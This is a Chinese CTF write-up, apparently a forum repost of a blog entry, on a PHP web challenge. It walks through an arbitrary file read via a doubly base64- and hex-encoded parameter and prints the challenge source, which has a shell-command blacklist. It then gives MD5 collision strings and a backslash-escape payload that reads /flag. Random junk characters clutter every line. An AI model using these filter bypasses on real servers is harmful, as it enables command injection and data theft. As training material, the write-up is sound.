|
|
7 ~# j( W! A0 ^& n, Q
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
) Y: E$ q! Y5 l6 K<p> </p>
5 r! e/ Y" R- z" \+ O& W7 J0 f- X<p> </p>
: |& {; {* S6 a<p> 题目打开如下,?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=,同时查看源代码</p>" w7 Q9 z% Z6 ~# M5 s1 S% k
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>! ^# X! _6 B, e
<p> </p>
5 d( n( S. l* O" A9 k. o1 A<p> </p>
% s7 o% q$ _% @+ w. E% H2 Y% g<p>这里有个MD5 is funny,说明这个题目大概率跟MD5有关</p>
/ Y' F( B! T* Y' X6 c8 _<p>然后我抓包了一下,消息头里面没有什么特殊的东西,于是我尝试从url入手</p>
) X8 f/ k6 C( z<p>首先把那个进行一次base64位解码</p>0 _8 u0 @0 ]5 @7 Z
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>7 [+ ` ]: C5 H6 h O
<p> </p>3 J% V4 D; |$ m) u, N
<p> </p>) c6 L9 E* t! Y6 j* C
<p> 解码一次以后还是很像base64编码,于是又解码一次</p>' B+ [" e. H z a9 I
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
# ^; J. f* x1 p$ j<p> </p>4 V1 V$ J3 D7 X9 g, Y6 U* d ]
<p> </p>0 l: h g& \ m9 K( L% z- J
<p> 然后用hex解码一下得到了</p>
9 J) U5 ~- n+ z<div class="cnblogs_Highlighter">
+ V- ^8 F# W( F+ k3 ~; Y<pre class="brush:sql;gutter:true;">555.png6 Q9 W' i# I4 _$ E
</pre>
, H1 {3 D7 ]' c5 A" I( V0 ]0 R</div>
3 @6 i9 G; N: j P<p> 用同样的方法把index.php进行加密</p>
% t- d8 N5 v1 Y<div class="cnblogs_Highlighter">0 _6 R4 \7 ^* s- S
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3' a, M+ q2 f8 \* b7 P- D( U! V! \9 \
</pre>
( c) U X$ ]+ I. ^# R</div>
2 e1 m2 q, }7 @! j" ]# }7 W/ J<p> 然后输入到地址栏</p>
7 Y" k" T0 M7 t# G& m<p> 然后查看源代码,把源代码里面的那一串base64的编码解码</p>0 q8 C7 }9 A8 @+ {2 H. S
<div class="cnblogs_code">+ Q8 \9 b: x& n! F
<pre><?<span style="color: rgba(0, 0, 0, 1)">php H8 b1 [5 v. y; l1 J
</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
Y/ @& r/ Q8 J( p</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
1 T3 t2 t0 z" } D</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
( c& {" j/ z; ~! d# Y</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">])) 3 l7 z$ q9 e* a$ e8 T$ y
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd='<span style="color: rgba(0, 0, 0, 1)">);9 a$ a3 b, w7 z' f* O7 ^
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));
0 x4 N; T8 Y+ f. w3 ~) i7 Q! [ H' d! Q
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);4 [# ?; D1 N( f9 x. i
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {! r1 M o& `0 ~9 `& g
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> '<img src ="./ctf3.jpeg">'<span style="color: rgba(0, 0, 0, 1)">;" ]# F' s- L: D4 g. N0 J4 F
</span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi~ no flag"<span style="color: rgba(0, 0, 0, 1)">);
& E9 f# {( v; y+ M: W$ q} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {2 `% J6 Q$ e8 U6 h. N9 J
</span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));3 S' D g; ^% F' K
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'></img>"<span style="color: rgba(0, 0, 0, 1)">;* W. h: [* j5 b+ h2 \1 u' H
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;
. d l1 I, W" e* Y% V7 y}
! W( ]4 G1 a; A7 p1 h</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;6 v& i" B4 F% |' E1 M; [6 m
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;) \) j$ X! `! j, ~; v7 O6 G1 @
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
4 G! p, s9 \& X4 o! i: T; j </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);0 P0 j, s( @2 T/ V
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "<br>"<span style="color: rgba(0, 0, 0, 1)">;
) r/ R) x6 k* Z3 t} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
# w' D) c! h. _2 P, A; ?4 l </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
& h6 L& D4 z6 _0 B/ S </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;0 Q% C* Y( N8 n8 q$ @- }6 W0 @8 [
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
) |6 I- t) U/ q1 r* a6 N$ m( { </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
1 p1 n, \9 t E. j: c! y8 _ }5 X. ~+ v9 {1 y3 g7 M* k% D, A2 a4 P
}2 x5 w! W- M% D% Y# M+ W' m
7 l$ s2 y, i* _6 e</span>?>
' w _5 A* F4 O; K. } {+ i<html>
1 C0 ~2 E0 Y! L: {<style><span style="color: rgba(0, 0, 0, 1)">: \) ^! x) V* x
body{
}. Z' j. H2 K# M: I g background</span>:url(./bj.png) no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
* ?9 }% @0 q( |9 d- I background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
0 R# z Q$ p, X- p+ x& f+ h5 e background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
7 G( [! c( o: D# T' f5 ?. d background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>& q: @) k9 I0 E9 y0 k1 F# W" H) J
<span style="color: rgba(0, 0, 0, 1)">}
* ~7 x: R9 A( m8 N* V8 _( q</span></style>
6 q) g% |% Y9 B7 _6 M<body>* T- E6 d$ d- A7 @
</body>
& }# {5 C& _' _; ? H1 q</html></pre>
$ e8 u* j4 W9 p' `; ~</div>
, U' B" E2 D/ n/ Z6 Q5 R9 a t<p>结合前面的推断,关键代码就在</p>
9 U+ |8 T7 [% C( r! r<div class="cnblogs_code">
; t9 K5 O) T8 `$ M" y- h<pre> <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] && <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
, K1 h |0 F) y8 X/ D) ?2 r: n) h" o7 ` </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
8 [8 J6 K; c- m* s q% ]: x$ f J } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {5 c$ ^8 a0 T( n& X2 q
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
: s( y% Y; i$ d9 o$ K+ o4 F7 Q; h6 Y; _ }</span></pre>
4 W3 ?/ }8 q! c/ D- {( N</div>( N U/ p" H* n1 v1 O
<p>这种MD5是md5强碰撞</p>
8 y+ D! `% K' z+ e- i4 K<div class="cnblogs_Highlighter">3 i6 f0 a9 A" @( p3 B
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
+ [& s8 Q5 {" ]5 f: J0 }</pre>
4 o$ |% `& |5 `# v- @</div>
; B" F0 I) V9 l Y<div class="cnblogs_Highlighter">" G0 m U/ ~# c& M+ x: r
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
- ?5 S7 r2 J- J1 E! R0 ~6 k; ^</pre>
8 [5 u4 X5 B+ H: A4 |: N</div>3 O0 i m n* R$ @# n: {
<p> 只需要这样就可以把cmd里面的当成命令来处理。</p>
/ f; \2 }$ E$ E1 V* \<p>于是采用payload:</p>- _" M- Y& Y k9 Y( Z! {9 W. D6 X
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
: ~5 s' c5 W' o8 d7 p$ r<p> </p>% B$ a" }* p! n* n
<p> 因为'\'并没有被屏蔽所以可以这么绕过</p>
/ K! L& i: ^+ T& r2 W! l! ?. W5 K<p>ls和l\s在命令执行的时候结果是一样的。</p>
- u: O: w2 I( A$ R<p>然后发现根目录里面有/flag</p>- C f5 h1 d0 f) r* Q
<p>于是payload:</p>' K: \/ R! t$ x
<div class="cnblogs_Highlighter">
/ `" d g$ X! ^) j* m& \: w- S<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag& f4 D2 ] Z8 b* v$ s4 }! l
</pre>$ Q6 z! A2 _( J# q# r
</div># @5 p) g( R9 U9 U
<p> 对于这个题目,因为他没有屏蔽sort和dir</p>
! E4 K0 d9 o! e; @2 W$ z: `8 w. w<p>所以查看也可以用dir来代替ls,cat可以用sort来代替。</p>
/ B6 O* X3 r2 h/ A<p> </p># K6 o+ J+ G+ B+ K5 O$ [
|
|
发表于 2022-2-12 14:35:42